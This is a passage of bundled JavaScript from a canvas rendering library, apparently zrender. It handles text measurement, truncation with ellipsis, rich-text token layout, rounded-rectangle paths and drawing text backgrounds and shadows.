getWidth(textLine, font);\n\n    if (lineWidth <= containerWidth) {\n        return textLine;\n    }\n\n    for (var j = 0; ; j++) {\n        if (lineWidth <= contentWidth || j >= options.maxIterations) {\n            textLine += options.ellipsis;\n            break;\n        }\n\n        var subLength = j === 0\n            ? estimateLength(textLine, contentWidth, options.ascCharWidth, options.cnCharWidth)\n            : lineWidth > 0\n            ? Math.floor(textLine.length * contentWidth / lineWidth)\n            : 0;\n\n        textLine = textLine.substr(0, subLength);\n        lineWidth = getWidth(textLine, font);\n    }\n\n    if (textLine === '') {\n        textLine = options.placeholder;\n    }\n\n    return textLine;\n}\n\nfunction estimateLength(text, contentWidth, ascCharWidth, cnCharWidth) {\n    var width = 0;\n    var i = 0;\n    for (var len = text.length; i < len && width < contentWidth; i++) {\n        var charCode = text.charCodeAt(i);\n        width += (0 <= charCode && charCode <= 127) ? ascCharWidth : cnCharWidth;\n    }\n    return i;\n}\n\n/**\n * @public\n * @param {string} font\n * @return {number} line height\n */\nfunction getLineHeight(font) {\n    // FIXME A rough approach.\n    return getWidth('国', font);\n}\n\n/**\n * @public\n * @param {string} text\n * @param {string} font\n * @return {Object} width\n */\nfunction measureText(text, font) {\n    return methods$1.measureText(text, font);\n}\n\n// Avoid assign to an exported variable, for transforming to cjs.\nmethods$1.measureText = function (text, font) {\n    var ctx = getContext();\n    ctx.font = font || DEFAULT_FONT$1;\n    return ctx.measureText(text);\n};\n\n/**\n * @public\n * @param {string} text\n * @param {string} font\n * @param {Object} [truncate]\n * @return {Object} block: {lineHeight, lines, height, outerHeight, canCacheByTextString}\n *  Notice: for performance, do not calculate outerWidth util needed.\n *  `canCacheByTextString` means the result `lines` is only determined by the input `text`.\n *  Thus we can simply comparing the `input` text to determin whether the result changed,\n *  without travel the result `lines`.\n */\nfunction parsePlainText(text, font, padding, textLineHeight, truncate) {\n    text != null && (text += '');\n\n    var lineHeight = retrieve2(textLineHeight, getLineHeight(font));\n    var lines = text ? text.split('\\n') : [];\n    var height = lines.length * lineHeight;\n    var outerHeight = height;\n    var canCacheByTextString = true;\n\n    if (padding) {\n        outerHeight += padding[0] + padding[2];\n    }\n\n    if (text && truncate) {\n        canCacheByTextString = false;\n        var truncOuterHeight = truncate.outerHeight;\n        var truncOuterWidth = truncate.outerWidth;\n        if (truncOuterHeight != null && outerHeight > truncOuterHeight) {\n            text = '';\n            lines = [];\n        }\n        else if (truncOuterWidth != null) {\n            var options = prepareTruncateOptions(\n                truncOuterWidth - (padding ? padding[1] + padding[3] : 0),\n                font,\n                truncate.ellipsis,\n                {minChar: truncate.minChar, placeholder: truncate.placeholder}\n            );\n\n            // FIXME\n            // It is not appropriate that every line has '...' when truncate multiple lines.\n            for (var i = 0, len = lines.length; i < len; i++) {\n                lines[i] = truncateSingleLine(lines[i], options);\n            }\n        }\n    }\n\n    return {\n        lines: lines,\n        height: height,\n        outerHeight: outerHeight,\n        lineHeight: lineHeight,\n        canCacheByTextString: canCacheByTextString\n    };\n}\n\n/**\n * For example: 'some text {a|some text}other text{b|some text}xxx{c|}xxx'\n * Also consider 'bbbb{a|xxx\\nzzz}xxxx\\naaaa'.\n *\n * @public\n * @param {string} text\n * @param {Object} style\n * @return {Object} block\n * {\n *      width,\n *      height,\n *      lines: [{\n *          lineHeight,\n *          width,\n *          tokens: [[{\n *              styleName,\n *              text,\n *              width,      // include textPadding\n *              height,     // include textPadding\n *              textWidth, // pure text width\n *              textHeight, // pure text height\n *              lineHeihgt,\n *              font,\n *              textAlign,\n *              textVerticalAlign\n *          }], [...], ...]\n *      }, ...]\n * }\n * If styleName is undefined, it is plain text.\n */\nfunction parseRichText(text, style) {\n    var contentBlock = {lines: [], width: 0, height: 0};\n\n    text != null && (text += '');\n    if (!text) {\n        return contentBlock;\n    }\n\n    var lastIndex = STYLE_REG.lastIndex = 0;\n    var result;\n    while ((result = STYLE_REG.exec(text)) != null) {\n        var matchedIndex = result.index;\n        if (matchedIndex > lastIndex) {\n            pushTokens(contentBlock, text.substring(lastIndex, matchedIndex));\n        }\n        pushTokens(contentBlock, result[2], result[1]);\n        lastIndex = STYLE_REG.lastIndex;\n    }\n\n    if (lastIndex < text.length) {\n        pushTokens(contentBlock, text.substring(lastIndex, text.length));\n    }\n\n    var lines = contentBlock.lines;\n    var contentHeight = 0;\n    var contentWidth = 0;\n    // For `textWidth: 100%`\n    var pendingList = [];\n\n    var stlPadding = style.textPadding;\n\n    var truncate = style.truncate;\n    var truncateWidth = truncate && truncate.outerWidth;\n    var truncateHeight = truncate && truncate.outerHeight;\n    if (stlPadding) {\n        truncateWidth != null && (truncateWidth -= stlPadding[1] + stlPadding[3]);\n        truncateHeight != null && (truncateHeight -= stlPadding[0] + stlPadding[2]);\n    }\n\n    // Calculate layout info of tokens.\n    for (var i = 0; i < lines.length; i++) {\n        var line = lines[i];\n        var lineHeight = 0;\n        var lineWidth = 0;\n\n        for (var j = 0; j < line.tokens.length; j++) {\n            var token = line.tokens[j];\n            var tokenStyle = token.styleName && style.rich[token.styleName] || {};\n            // textPadding should not inherit from style.\n            var textPadding = token.textPadding = tokenStyle.textPadding;\n\n            // textFont has been asigned to font by `normalizeStyle`.\n            var font = token.font = tokenStyle.font || style.font;\n\n            // textHeight can be used when textVerticalAlign is specified in token.\n            var tokenHeight = token.textHeight = retrieve2(\n                // textHeight should not be inherited, consider it can be specified\n                // as box height of the block.\n                tokenStyle.textHeight, getLineHeight(font)\n            );\n            textPadding && (tokenHeight += textPadding[0] + textPadding[2]);\n            token.height = tokenHeight;\n            token.lineHeight = retrieve3(\n                tokenStyle.textLineHeight, style.textLineHeight, tokenHeight\n            );\n\n            token.textAlign = tokenStyle && tokenStyle.textAlign || style.textAlign;\n            token.textVerticalAlign = tokenStyle && tokenStyle.textVerticalAlign || 'middle';\n\n            if (truncateHeight != null && contentHeight + token.lineHeight > truncateHeight) {\n                return {lines: [], width: 0, height: 0};\n            }\n\n            token.textWidth = getWidth(token.text, font);\n            var tokenWidth = tokenStyle.textWidth;\n            var tokenWidthNotSpecified = tokenWidth == null || tokenWidth === 'auto';\n\n            // Percent width, can be `100%`, can be used in drawing separate\n            // line when box width is needed to be auto.\n            if (typeof tokenWidth === 'string' && tokenWidth.charAt(tokenWidth.length - 1) === '%') {\n                token.percentWidth = tokenWidth;\n                pendingList.push(token);\n                tokenWidth = 0;\n                // Do not truncate in this case, because there is no user case\n                // and it is too complicated.\n            }\n            else {\n                if (tokenWidthNotSpecified) {\n                    tokenWidth = token.textWidth;\n\n                    // FIXME: If image is not loaded and textWidth is not specified, calling\n                    // `getBoundingRect()` will not get correct result.\n                    var textBackgroundColor = tokenStyle.textBackgroundColor;\n                    var bgImg = textBackgroundColor && textBackgroundColor.image;\n\n                    // Use cases:\n                    // (1) If image is not loaded, it will be loaded at render phase and call\n                    // `dirty()` and `textBackgroundColor.image` will be replaced with the loaded\n                    // image, and then the right size will be calculated here at the next tick.\n                    // See `graphic/helper/text.js`.\n                    // (2) If image loaded, and `textBackgroundColor.image` is image src string,\n                    // use `imageHelper.findExistImage` to find cached image.\n                    // `imageHelper.findExistImage` will always be called here before\n                    // `imageHelper.createOrUpdateImage` in `graphic/helper/text.js#renderRichText`\n                    // which ensures that image will not be rendered before correct size calcualted.\n                    if (bgImg) {\n                        bgImg = findExistImage(bgImg);\n                        if (isImageReady(bgImg)) {\n                            tokenWidth = Math.max(tokenWidth, bgImg.width * tokenHeight / bgImg.height);\n                        }\n                    }\n                }\n\n                var paddingW = textPadding ? textPadding[1] + textPadding[3] : 0;\n                tokenWidth += paddingW;\n\n                var remianTruncWidth = truncateWidth != null ? truncateWidth - lineWidth : null;\n\n                if (remianTruncWidth != null && remianTruncWidth < tokenWidth) {\n                    if (!tokenWidthNotSpecified || remianTruncWidth < paddingW) {\n                        token.text = '';\n                        token.textWidth = tokenWidth = 0;\n                    }\n                    else {\n                        token.text = truncateText(\n                            token.text, remianTruncWidth - paddingW, font, truncate.ellipsis,\n                            {minChar: truncate.minChar}\n                        );\n                        token.textWidth = getWidth(token.text, font);\n                        tokenWidth = token.textWidth + paddingW;\n                    }\n                }\n            }\n\n            lineWidth += (token.width = tokenWidth);\n            tokenStyle && (lineHeight = Math.max(lineHeight, token.lineHeight));\n        }\n\n        line.width = lineWidth;\n        line.lineHeight = lineHeight;\n        contentHeight += lineHeight;\n        contentWidth = Math.max(contentWidth, lineWidth);\n    }\n\n    contentBlock.outerWidth = contentBlock.width = retrieve2(style.textWidth, contentWidth);\n    contentBlock.outerHeight = contentBlock.height = retrieve2(style.textHeight, contentHeight);\n\n    if (stlPadding) {\n        contentBlock.outerWidth += stlPadding[1] + stlPadding[3];\n        contentBlock.outerHeight += stlPadding[0] + stlPadding[2];\n    }\n\n    for (var i = 0; i < pendingList.length; i++) {\n        var token = pendingList[i];\n        var percentWidth = token.percentWidth;\n        // Should not base on outerWidth, because token can not be placed out of padding.\n        token.width = parseInt(percentWidth, 10) / 100 * contentWidth;\n    }\n\n    return contentBlock;\n}\n\nfunction pushTokens(block, str, styleName) {\n    var isEmptyStr = str === '';\n    var strs = str.split('\\n');\n    var lines = block.lines;\n\n    for (var i = 0; i < strs.length; i++) {\n        var text = strs[i];\n        var token = {\n            styleName: styleName,\n            text: text,\n            isLineHolder: !text && !isEmptyStr\n        };\n\n        // The first token should be appended to the last line.\n        if (!i) {\n            var tokens = (lines[lines.length - 1] || (lines[0] = {tokens: []})).tokens;\n\n            // Consider cases:\n            // (1) ''.split('\\n') => ['', '\\n', ''], the '' at the first item\n            // (which is a placeholder) should be replaced by new token.\n            // (2) A image backage, where token likes {a|}.\n            // (3) A redundant '' will affect textAlign in line.\n            // (4) tokens with the same tplName should not be merged, because\n            // they should be displayed in different box (with border and padding).\n            var tokensLen = tokens.length;\n            (tokensLen === 1 && tokens[0].isLineHolder)\n                ? (tokens[0] = token)\n                // Consider text is '', only insert when it is the \"lineHolder\" or\n                // \"emptyStr\". Otherwise a redundant '' will affect textAlign in line.\n                : ((text || !tokensLen || isEmptyStr) && tokens.push(token));\n        }\n        // Other tokens always start a new line.\n        else {\n            // If there is '', insert it as a placeholder.\n            lines.push({tokens: [token]});\n        }\n    }\n}\n\nfunction makeFont(style) {\n    // FIXME in node-canvas fontWeight is before fontStyle\n    // Use `fontSize` `fontFamily` to check whether font properties are defined.\n    var font = (style.fontSize || style.fontFamily) && [\n        style.fontStyle,\n        style.fontWeight,\n        (style.fontSize || 12) + 'px',\n        // If font properties are defined, `fontFamily` should not be ignored.\n        style.fontFamily || 'sans-serif'\n    ].join(' ');\n    return font && trim(font) || style.textFont || style.font;\n}\n\n/**\n * @param {Object} ctx\n * @param {Object} shape\n * @param {number} shape.x\n * @param {number} shape.y\n * @param {number} shape.width\n * @param {number} shape.height\n * @param {number} shape.r\n */\nfunction buildPath(ctx, shape) {\n    var x = shape.x;\n    var y = shape.y;\n    var width = shape.width;\n    var height = shape.height;\n    var r = shape.r;\n    var r1;\n    var r2;\n    var r3;\n    var r4;\n\n    // Convert width and height to positive for better borderRadius\n    if (width < 0) {\n        x = x + width;\n        width = -width;\n    }\n    if (height < 0) {\n        y = y + height;\n        height = -height;\n    }\n\n    if (typeof r === 'number') {\n        r1 = r2 = r3 = r4 = r;\n    }\n    else if (r instanceof Array) {\n        if (r.length === 1) {\n            r1 = r2 = r3 = r4 = r[0];\n        }\n        else if (r.length === 2) {\n            r1 = r3 = r[0];\n            r2 = r4 = r[1];\n        }\n        else if (r.length === 3) {\n            r1 = r[0];\n            r2 = r4 = r[1];\n            r3 = r[2];\n        }\n        else {\n            r1 = r[0];\n            r2 = r[1];\n            r3 = r[2];\n            r4 = r[3];\n        }\n    }\n    else {\n        r1 = r2 = r3 = r4 = 0;\n    }\n\n    var total;\n    if (r1 + r2 > width) {\n        total = r1 + r2;\n        r1 *= width / total;\n        r2 *= width / total;\n    }\n    if (r3 + r4 > width) {\n        total = r3 + r4;\n        r3 *= width / total;\n        r4 *= width / total;\n    }\n    if (r2 + r3 > height) {\n        total = r2 + r3;\n        r2 *= height / total;\n        r3 *= height / total;\n    }\n    if (r1 + r4 > height) {\n        total = r1 + r4;\n        r1 *= height / total;\n        r4 *= height / total;\n    }\n    ctx.moveTo(x + r1, y);\n    ctx.lineTo(x + width - r2, y);\n    r2 !== 0 && ctx.arc(x + width - r2, y + r2, r2, -Math.PI / 2, 0);\n    ctx.lineTo(x + width, y + height - r3);\n    r3 !== 0 && ctx.arc(x + width - r3, y + height - r3, r3, 0, Math.PI / 2);\n    ctx.lineTo(x + r4, y + height);\n    r4 !== 0 && ctx.arc(x + r4, y + height - r4, r4, Math.PI / 2, Math.PI);\n    ctx.lineTo(x, y + r1);\n    r1 !== 0 && ctx.arc(x + r1, y + r1, r1, Math.PI, Math.PI * 1.5);\n}\n\nvar DEFAULT_FONT = DEFAULT_FONT$1;\n\n// TODO: Have not support 'start', 'end' yet.\nvar VALID_TEXT_ALIGN = {left: 1, right: 1, center: 1};\nvar VALID_TEXT_VERTICAL_ALIGN = {top: 1, bottom: 1, middle: 1};\n// Different from `STYLE_COMMON_PROPS` of `graphic/Style`,\n// the default value of shadowColor is `'transparent'`.\nvar SHADOW_STYLE_COMMON_PROPS = [\n    ['textShadowBlur', 'shadowBlur', 0],\n    ['textShadowOffsetX', 'shadowOffsetX', 0],\n    ['textShadowOffsetY', 'shadowOffsetY', 0],\n    ['textShadowColor', 'shadowColor', 'transparent']\n];\nvar _tmpTextPositionResult = {};\nvar _tmpBoxPositionResult = {};\n\n/**\n * @param {module:zrender/graphic/Style} style\n * @return {module:zrender/graphic/Style} The input style.\n */\nfunction normalizeTextStyle(style) {\n    normalizeStyle(style);\n    each$1(style.rich, normalizeStyle);\n    return style;\n}\n\nfunction normalizeStyle(style) {\n    if (style) {\n\n        style.font = makeFont(style);\n\n        var textAlign = style.textAlign;\n        textAlign === 'middle' && (textAlign = 'center');\n        style.textAlign = (\n            textAlign == null || VALID_TEXT_ALIGN[textAlign]\n        ) ? textAlign : 'left';\n\n        // Compatible with textBaseline.\n        var textVerticalAlign = style.textVerticalAlign || style.textBaseline;\n        textVerticalAlign === 'center' && (textVerticalAlign = 'middle');\n        style.textVerticalAlign = (\n            textVerticalAlign == null || VALID_TEXT_VERTICAL_ALIGN[textVerticalAlign]\n        ) ? textVerticalAlign : 'top';\n\n        var textPadding = style.textPadding;\n        if (textPadding) {\n            style.textPadding = normalizeCssArray(style.textPadding);\n        }\n    }\n}\n\n/**\n * @param {CanvasRenderingContext2D} ctx\n * @param {string} text\n * @param {module:zrender/graphic/Style} style\n * @param {Object|boolean} [rect] {x, y, width, height}\n *                  If set false, rect text is not used.\n * @param {Element|module:zrender/graphic/helper/constant.WILL_BE_RESTORED} [prevEl] For ctx prop cache.\n */\nfunction renderText(hostEl, ctx, text, style, rect, prevEl) {\n    style.rich\n        ? renderRichText(hostEl, ctx, text, style, rect, prevEl)\n        : renderPlainText(hostEl, ctx, text, style, rect, prevEl);\n}\n\n// Avoid setting to ctx according to prevEl if possible for\n// performance in scenarios of large amount text.\nfunction renderPlainText(hostEl, ctx, text, style, rect, prevEl) {\n    'use strict';\n\n    var needDrawBg = needDrawBackground(style);\n\n    var prevStyle;\n    var checkCache = false;\n    var cachedByMe = ctx.__attrCachedBy === ContextCachedBy.PLAIN_TEXT;\n\n    // Only take and check cache for `Text` el, but not RectText.\n    if (prevEl !== WILL_BE_RESTORED) {\n        if (prevEl) {\n            prevStyle = prevEl.style;\n            checkCache = !needDrawBg && cachedByMe && prevStyle;\n        }\n\n        // Prevent from using cache in `Style::bind`, because of the case:\n        // ctx property is modified by other properties than `Style::bind`\n        // used, and Style::bind is called next.\n        ctx.__attrCachedBy = needDrawBg ? ContextCachedBy.NONE : ContextCachedBy.PLAIN_TEXT;\n    }\n    // Since this will be restored, prevent from using these props to check cache in the next\n    // entering of this method. But do not need to clear other cache like `Style::bind`.\n    else if (cachedByMe) {\n        ctx.__attrCachedBy = ContextCachedBy.NONE;\n    }\n\n    var styleFont = style.font || DEFAULT_FONT;\n    // PENDING\n    // Only `Text` el set `font` and keep it (`RectText` will restore). So theoretically\n    // we can make font cache on ctx, which can cache for text el that are discontinuous.\n    // But layer save/restore needed to be considered.\n    // if (styleFont !== ctx.__fontCache) {\n    //     ctx.font = styleFont;\n    //     if (prevEl !== WILL_BE_RESTORED) {\n    //         ctx.__fontCache = styleFont;\n    //     }\n    // }\n    if (!checkCache || styleFont !== (prevStyle.font || DEFAULT_FONT)) {\n        ctx.font = styleFont;\n    }\n\n    // Use the final font from context-2d, because the final\n    // font might not be the style.font when it is illegal.\n    // But get `ctx.font` might be time consuming.\n    var computedFont = hostEl.__computedFont;\n    if (hostEl.__styleFont !== styleFont) {\n        hostEl.__styleFont = styleFont;\n        computedFont = hostEl.__computedFont = ctx.font;\n    }\n\n    var textPadding = style.textPadding;\n    var textLineHeight = style.textLineHeight;\n\n    var contentBlock = hostEl.__textCotentBlock;\n    if (!contentBlock || hostEl.__dirtyText) {\n        contentBlock = hostEl.__textCotentBlock = parsePlainText(\n            text, computedFont, textPadding, textLineHeight, style.truncate\n        );\n    }\n\n    var outerHeight = contentBlock.outerHeight;\n\n    var textLines = contentBlock.lines;\n    var lineHeight = contentBlock.lineHeight;\n\n    var boxPos = getBoxPosition(_tmpBoxPositionResult, hostEl, style, rect);\n    var baseX = boxPos.baseX;\n    var baseY = boxPos.baseY;\n    var textAlign = boxPos.textAlign || 'left';\n    var textVerticalAlign = boxPos.textVerticalAlign;\n\n    // Origin of textRotation should be the base point of text drawing.\n    applyTextRotation(ctx, style, rect, baseX, baseY);\n\n    var boxY = adjustTextY(baseY, outerHeight, textVerticalAlign);\n    var textX = baseX;\n    var textY = boxY;\n\n    if (needDrawBg || textPadding) {\n        // Consider performance, do not call getTextWidth util necessary.\n        var textWidth = getWidth(text, computedFont);\n        var outerWidth = textWidth;\n        textPadding && (outerWidth += textPadding[1] + textPadding[3]);\n        var boxX = adjustTextX(baseX, outerWidth, textAlign);\n\n        needDrawBg && drawBackground(hostEl, ctx, style, boxX, boxY, outerWidth, outerHeight);\n\n        if (textPadding) {\n            textX = getTextXForPadding(baseX, textAlign, textPadding);\n            textY += textPadding[0];\n        }\n    }\n\n    // Always set textAlign and textBase line, because it is difficute to calculate\n    // textAlign from prevEl, and we dont sure whether textAlign will be reset if\n    // font set happened.\n    ctx.textAlign = textAlign;\n    // Force baseline to be \"middle\". Otherwise, if using \"top\", the\n    // text will offset downward a little bit in font \"Microsoft YaHei\".\n    ctx.textBaseline = 'middle';\n    // Set text opacity\n    ctx.globalAlpha = style.opacity || 1;\n\n    // Always set shadowBlur and shadowOffset to avoid leak from displayable.\n    for (var i = 0; i < SHADOW_STYLE_COMMON_PROPS.length; i++) {\n        var propItem = SHADOW_STYLE_COMMON_PROPS[i];\n        var styleProp = propItem[0];\n        var ctxProp = propItem[1];\n        var val = style[styleProp];\n        if (!checkCache || val !== prevStyle[styleProp]) {\n            ctx[ctxProp] = fixShadow(ctx, ctxProp, val || propItem[2]);\n        }\n    }\n\n    // `textBaseline` is set as 'middle'.\n    textY += lineHeight / 2;\n\n    var textStrokeWidth = style.textStrokeWidth;\n    var textStrokeWidthPrev = checkCache ? prevStyle.textStrokeWidth : null;\n    var strokeWidthChanged = !checkCache || textStrokeWidth !== textStrokeWidthPrev;\n    var strokeChanged = !checkCache || strokeWidthChanged || style.textStroke !== prevStyle.textStroke;\n    var textStroke = getStroke(style.textStroke, textStrokeWidth);\n    var textFill = getFill(style.textFill);\n\n    if (textStroke) {\n        if (strokeWidthChanged) {\n            ctx.lineWidth = textStrokeWidth;\n        }\n        if (strokeChanged) {\n            ctx.strokeStyle = textStroke;\n        }\n    }\n    if (textFill) {\n        if (!checkCache || style.textFill !== prevStyle.textFill) {\n            ctx.fillStyle = textFill;\n        }\n    }\n\n    // Optimize simply, in most cases only one line exists.\n    if (textLines.length === 1) {\n        // Fill after stroke so the outline will not cover the main part.\n        textStroke && ctx.strokeText(textLines[0], textX, textY);\n        textFill && ctx.fillText(textLines[0], textX, textY);\n    }\n    else {\n        for (var i = 0; i < textLines.length; i++) {\n            // Fill after stroke so the outline will not cover the main part.\n            textStroke && ctx.strokeText(textLines[i], textX, textY);\n            textFill && ctx.fillText(textLines[i], textX, textY);\n            textY += lineHeight;\n        }\n    }\n}\n\nfunction renderRichText(hostEl, ctx, text, style, rect, prevEl) {\n    // Do not do cache for rich text because of the complexity.\n    // But `RectText` this will be restored, do not need to clear other cache like `Style::bind`.\n    if (prevEl !== WILL_BE_RESTORED) {\n        ctx.__attrCachedBy = ContextCachedBy.NONE;\n    }\n\n    var contentBlock = hostEl.__textCotentBlock;\n\n    if (!contentBlock || hostEl.__dirtyText) {\n        contentBlock = hostEl.__textCotentBlock = parseRichText(text, style);\n    }\n\n    drawRichText(hostEl, ctx, contentBlock, style, rect);\n}\n\nfunction drawRichText(hostEl, ctx, contentBlock, style, rect) {\n    var contentWidth = contentBlock.width;\n    var outerWidth = contentBlock.outerWidth;\n    var outerHeight = contentBlock.outerHeight;\n    var textPadding = style.textPadding;\n\n    var boxPos = getBoxPosition(_tmpBoxPositionResult, hostEl, style, rect);\n    var baseX = boxPos.baseX;\n    var baseY = boxPos.baseY;\n    var textAlign = boxPos.textAlign;\n    var textVerticalAlign = boxPos.textVerticalAlign;\n\n    // Origin of textRotation should be the base point of text drawing.\n    applyTextRotation(ctx, style, rect, baseX, baseY);\n\n    var boxX = adjustTextX(baseX, outerWidth, textAlign);\n    var boxY = adjustTextY(baseY, outerHeight, textVerticalAlign);\n    var xLeft = boxX;\n    var lineTop = boxY;\n    if (textPadding) {\n        xLeft += textPadding[3];\n        lineTop += textPadding[0];\n    }\n    var xRight = xLeft + contentWidth;\n\n    needDrawBackground(style) && drawBackground(\n        hostEl, ctx, style, boxX, boxY, outerWidth, outerHeight\n    );\n\n    for (var i = 0; i < contentBlock.lines.length; i++) {\n        var line = contentBlock.lines[i];\n        var tokens = line.tokens;\n        var tokenCount = tokens.length;\n        var lineHeight = line.lineHeight;\n        var usedWidth = line.width;\n\n        var leftIndex = 0;\n        var lineXLeft = xLeft;\n        var lineXRight = xRight;\n        var rightIndex = tokenCount - 1;\n        var token;\n\n        while (\n            leftIndex < tokenCount\n            && (token = tokens[leftIndex], !token.textAlign || token.textAlign === 'left')\n        ) {\n            placeToken(hostEl, ctx, token, style, lineHeight, lineTop, lineXLeft, 'left');\n            usedWidth -= token.width;\n            lineXLeft += token.width;\n            leftIndex++;\n        }\n\n        while (\n            rightIndex >= 0\n            && (token = tokens[rightIndex], token.textAlign === 'right')\n        ) {\n            placeToken(hostEl, ctx, token, style, lineHeight, lineTop, lineXRight, 'right');\n            usedWidth -= token.width;\n            lineXRight -= token.width;\n            rightIndex--;\n        }\n\n        // The other tokens are placed as textAlign 'center' if there is enough space.\n        lineXLeft += (contentWidth - (lineXLeft - xLeft) - (xRight - lineXRight) - usedWidth) / 2;\n        while (leftIndex <= rightIndex) {\n            token = tokens[leftIndex];\n            // Consider width specified by user, use 'center' rather than 'left'.\n            placeToken(hostEl, ctx, token, style, lineHeight, lineTop, lineXLeft + token.width / 2, 'center');\n            lineXLeft += token.width;\n            leftIndex++;\n        }\n\n        lineTop += lineHeight;\n    }\n}\n\nfunction applyTextRotation(ctx, style, rect, x, y) {\n    // textRotation only apply in RectText.\n    if (rect && style.textRotation) {\n        var origin = style.textOrigin;\n        if (origin === 'center') {\n            x = rect.width / 2 + rect.x;\n            y = rect.height / 2 + rect.y;\n        }\n        else if (origin) {\n            x = origin[0] + rect.x;\n            y = origin[1] + rect.y;\n        }\n\n        ctx.translate(x, y);\n        // Positive: anticlockwise\n        ctx.rotate(-style.textRotation);\n        ctx.translate(-x, -y);\n    }\n}\n\nfunction placeToken(hostEl, ctx, token, style, lineHeight, lineTop, x, textAlign) {\n    var tokenStyle = style.rich[token.styleName] || {};\n    tokenStyle.text = token.text;\n\n    // 'ctx.textBaseline' is always set as 'middle', for sake of\n    // the bias of \"Microsoft YaHei\".\n    var textVerticalAlign = token.textVerticalAlign;\n    var y = lineTop + lineHeight / 2;\n    if (textVerticalAlign === 'top') {\n        y = lineTop + token.height / 2;\n    }\n    else if (textVerticalAlign === 'bottom') {\n        y = lineTop + lineHeight - token.height / 2;\n    }\n\n    !token.isLineHolder && needDrawBackground(tokenStyle) && drawBackground(\n        hostEl,\n        ctx,\n        tokenStyle,\n        textAlign === 'right'\n            ? x - token.width\n            : textAlign === 'center'\n            ? x - token.width / 2\n            : x,\n        y - token.height / 2,\n        token.width,\n        token.height\n    );\n\n    var textPadding = token.textPadding;\n    if (textPadding) {\n        x = getTextXForPadding(x, textAlign, textPadding);\n        y -= token.height / 2 - textPadding[2] - token.textHeight / 2;\n    }\n\n    setCtx(ctx, 'shadowBlur', retrieve3(tokenStyle.textShadowBlur, style.textShadowBlur, 0));\n    setCtx(ctx, 'shadowColor', tokenStyle.textShadowColor || style.textShadowColor || 'transparent');\n    setCtx(ctx, 'shadowOffsetX', retrieve3(tokenStyle.textShadowOffsetX, style.textShadowOffsetX, 0));\n    setCtx(ctx, 'shadowOffsetY', retrieve3(tokenStyle.textShadowOffsetY, style.textShadowOffsetY, 0));\n\n    setCtx(ctx, 'textAlign', textAlign);\n    // Force baseline to be \"middle\". Otherwise, if using \"top\", the\n    // text will offset downward a little bit in font \"Microsoft YaHei\".\n    setCtx(ctx, 'textBaseline', 'middle');\n\n    setCtx(ctx, 'font', token.font || DEFAULT_FONT);\n\n    var textStroke = getStroke(tokenStyle.textStroke || style.textStroke, textStrokeWidth);\n    var textFill = getFill(tokenStyle.textFill || style.textFill);\n    var textStrokeWidth = retrieve2(tokenStyle.textStrokeWidth, style.textStrokeWidth);\n\n    // Fill after stroke so the outline will not cover the main part.\n    if (textStroke) {\n        setCtx(ctx, 'lineWidth', textStrokeWidth);\n        setCtx(ctx, 'strokeStyle', textStroke);\n        ctx.strokeText(token.text, x, y);\n    }\n    if (textFill) {\n        setCtx(ctx, 'fillStyle', textFill);\n        ctx.fillText(token.text, x, y);\n    }\n}\n\nfunction needDrawBackground(style) {\n    return !!(\n        style.textBackgroundColor\n        || (style.textBorderWidth && style.textBorderColor)\n    );\n}\n\n// style: {textBackgroundColor, textBorderWidth, textBorderColor, textBorderRadius, text}\n// shape: {x, y, width, height}\nfunction drawBackground(hostEl, ctx, style, x, y, width, height) {\n    var textBackgroundColor = style.textBackgroundColor;\n    var textBorderWidth = style.textBorderWidth;\n    var textBorderColor = style.textBorderColor;\n    var isPlainBg = isString(textBackgroundColor);\n\n    setCtx(ctx, 'shadowBlur', style.textBoxShadowBlur || 0);\n    setCtx(ctx, 'shadowColor', style.textBoxShadowColor || 'transparent');\n    setCtx(ctx, 'shadowOffsetX', style.textBoxShadowOffsetX || 0);\n    setCtx(ctx, 'shadowOffsetY', style.textBoxShadowOffsetY || 0);\n\n    if (isPlainBg || (textBorderWidth && textBorderColor)) {\n        ctx.beginPath();\n        var textBorderRadius = style.textBorderRadius;\n        if (!textBorderRadius) {\n            ctx.rect(x, y, width, height);\n        }\n        else {\n            buildPath(ctx, {\n                x: x, y: y, width: width, height: height, r: textBorderRadius\n            });\n        }\n        ctx.closePath();\n    }\n\n    if (isPlainBg) {\n        setCtx(ctx, 'fillStyle', textBackgroundColor);\n\n        if (style.fillOpacity != null) {\n            var originalGlobalAlpha = ctx.globalAlpha;\n            ctx.globalAlpha = style.fillOpacity * style.opacity;\n            ctx.fill();\n            ctx.globalAlpha = originalGlobalAlpha;\n        }\n        else {\n            ctx.fill();\n        }\n    }\n    else if (isObject$1(textBackgroundColor)) {\n        var image = textBackgroundColor.image;\n\n        image = createOrUpdateImage(\n            image, null, hostEl, onBgImageLoaded, textBackgroundColor\n        );\n        if (image && isImageReady(image)) {\n            ctx.drawImage(image, x, y, width, height);\n        }\n    }\n\n    if (textBorderWidth && textBorderColor) {\n        setCtx(ctx, 'lineWidth', textBorderWidth);\n        setCtx(ctx, 'strokeStyle', textBorderColor);\n\n        if (style.strokeOpacity != null) {\n            var originalGlobalAlpha = ctx.globalAlpha;\n            ctx.globalAlpha = style.strokeOpacity * style.opacity;\n            ctx.stroke();\n            ctx.globalAlpha = originalGlobalAlpha;\n        }\n        else {\n            ctx.stroke();\n        }\n    }\n}\n\nfunction onBgImageLoaded(image, textBackgroundColor) {\n    // Replace image, so that `contain/text.js#parseRichText`\n    // will get correct result in next tick.\n    textBackgroundColor.image = image;\n}\n\nfunction getBoxPosition(out, hostEl, style, rect) {\n    var baseX = style.x || 0;\n    var baseY = style.y || 0;\n    var textAlign = style.textAlign;\n    var textVerticalAlign = style.textVerticalAlign;\n\n    // Text position represented by coord\n    if (rect) {\n        var textPosition = style.textPosition;\n        if (textPosition instanceof Array) {\n            // Percent\n            baseX = rect.x + parsePercent(textPosition[0], rect.width);\n            baseY = rect.y + parsePercent(textPosition[1], rect.height);\n        }\n        else {\n            var res = (hostEl && hostEl.calculateTextPosition)\n                ? hostEl.calculateTextPosition(_tmpTextPositionResult, style, rect)\n                : calculateTextPosition(_tmpTextPositionResult, style, rect);\n            baseX = res.x;\n            baseY = res.y;\n            // Default align and baseline when has textPosition\n            textAlign = textAlign || res.textAlign;\n            textVerticalAlign = textVerticalAlign || res.textVerticalAlign;\n        }\n\n        // textOffset is only support in RectText, otherwise\n        // we have to adjust boundingRect for textOffset.\n        var textOffset = style.textOffset;\n        if (textOffset) {\n            baseX += textOffset[0];\n            baseY += textOffset[1];\n        }\n    }\n\n    out = out || {};\n    out.baseX = baseX;\n    out.baseY = baseY;\n    out.textAlign = textAlign;\n    out.textVerticalAlign = textVerticalAlign;\n\n    return out;\n}\n\n\nfunction setCtx(ctx, 